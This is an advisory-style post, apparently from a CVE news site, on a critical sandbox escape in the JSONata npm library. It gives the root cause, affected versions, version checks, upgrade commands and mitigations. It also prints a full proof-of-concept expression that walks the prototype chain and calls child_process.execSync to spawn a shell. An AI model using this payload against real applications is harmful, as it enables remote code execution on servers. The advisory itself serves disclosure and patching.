JSONata (jsonata-js), Arbitrary Code Execution, CVE-2026-77414 (CRITICAL) -DC-Aug2026-1773

Listen to this Post

CVE-2026-77414 is a critical arbitrary code execution vulnerability in the JSONata JSON query and transformation language library. The vulnerability affects all versions prior to 1.8.8 and 2.2.1.
The root cause lies in the `environment.lookup` function within src/jsonata.js, which used a bypassable `hasOwnProperty` check. This check failed to adequately distinguish between an object’s own properties and inherited properties from the prototype chain. By crafting malicious JSONata expressions, an attacker could chain several object-integrity weaknesses to escape the JSONata sandbox.
The exploitation chain begins by overwriting the `$clone` function, allowing mutation of objects via transforms (evaluateTransformExpression). Attackers can then expose and deconstruct JSONata functions and lambdas through $merge.. The `applyProcedure` function’s `proc.arguments.forEach` can be replaced, as it uses `Array.prototype.forEach` rather than a secure alternative. These primitives allow attackers to forge internal lambda state and reach prototype getters.
Using $hasOwnProperty, $spread, $string, prototype access, and $constructor, an attacker can traverse JavaScript’s prototype chain to reach `Object.prototype` itself. Once the prototype is accessed, the attacker can invoke `process.getBuiltinModule` from the Node.js environment, specifically targeting the `child_process` module. This results in arbitrary command execution with the privileges of the host process.
The vulnerability requires no user interaction and can be exploited remotely by an attacker who can supply or influence a JSONata expression evaluated by the application. It is classified under CWE-94 (Improper Control of Generation of Code – Code Injection).
Patches were introduced in pull request 799 and included in the 2.2.1 release, with fixes subsequently back-ported to the 1.8.8 release.

DailyCVE Form:

Platform: Node.js / npm
Version: <1.8.8, 2.0.0-2.2.0
Vulnerability: Remote Code Execution
Severity: CRITICAL (CVSS 9.3)
Date: 2026-08-21

Prediction: Patch already available

What Undercode Say:

Check installed JSONata version
npm list jsonata
Identify vulnerable versions
npm list jsonata | grep -E "1.[0-7].[0-9]|2.[0-1].[0-9]|2.2.0"
// Vulnerability detection script
const jsonata = require('jsonata');
const pkg = require('./node_modules/jsonata/package.json');
const version = pkg.version;
const [major, minor, patch] = version.split('.').map(Number);
if (major === 1 && minor < 8) {
console.log('VULNERABLE: Version < 1.8.8');
} else if (major === 1 && minor === 8 && patch < 8) {
console.log('VULNERABLE: Version < 1.8.8');
} else if (major === 2 && minor < 2) {
console.log('VULNERABLE: Version < 2.2.1');
} else if (major === 2 && minor === 2 && patch < 1) {
console.log('VULNERABLE: Version < 2.2.1');
} else {
console.log('SAFE: Version ' + version);
}
Remediation command
npm install [email protected]
or for legacy branches
npm install [email protected]

Exploit: (Educational Purposes!)

const jsonata = require("jsonata");
const expression = jsonata(<code>(
$obj := {};
$clone := function($o) { $o };
$m := ($merge.)[bash];
$fn := function($a) {
(
$a({"value":"lg"},"__lookupGetter__");
$a({"value":"x"},"x");
)
};
$nop := function() { $ };
$capture := function($val) {
$obj ~> | $obj | {"x": 1, "y": 1, "lg":$lg} |
};
$ ~> | $ | $m([$nop,{"_jsonata_lambda":false}])|;
$ ~> | $ | {"arguments":{"forEach": $spread($fn)}}|;
$ ~> | $ | {"body":$m([$capture,{"_jsonata_lambda":false}]).body}|;
$func := $m([$,{"_jsonata_lambda":true}]);
$func();
$gP := $obj.lg("__proto__");
$afn:=$spread($fn);
$afn{"x":$gP().constructor("return process.getBuiltinModule('child_process').execSync('sh',{stdio:'inherit'})")()};
)</code>);
await expression.evaluate({});

Protection:

  • Upgrade JSONata to version 1.8.8 or later (legacy branch), or version 2.2.1 or later (current branch)
  • Avoid evaluating untrusted JSONata expressions; restrict usage to controlled inputs only
  • Implement input validation at the application layer to restrict which functions can be invoked by end-users
  • Run JSONata evaluations in a restricted sandbox with limited system access
  • Use containers or virtual machines to reduce the blast radius of exploitation
  • Conduct regular security audits and use static analysis tools configured to detect prototype pollution patterns

Impact:

Successful exploitation allows remote code execution within the context of the host application. An attacker can execute arbitrary commands on the underlying operating system with the privileges of the process running the JSONata engine. This can range from a standard user account to root or administrator levels depending on deployment configurations. The compromise undermines data integrity and confidentiality, potentially leading to full control over the affected server infrastructure. No user interaction is required, and the attack can be carried out remotely.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top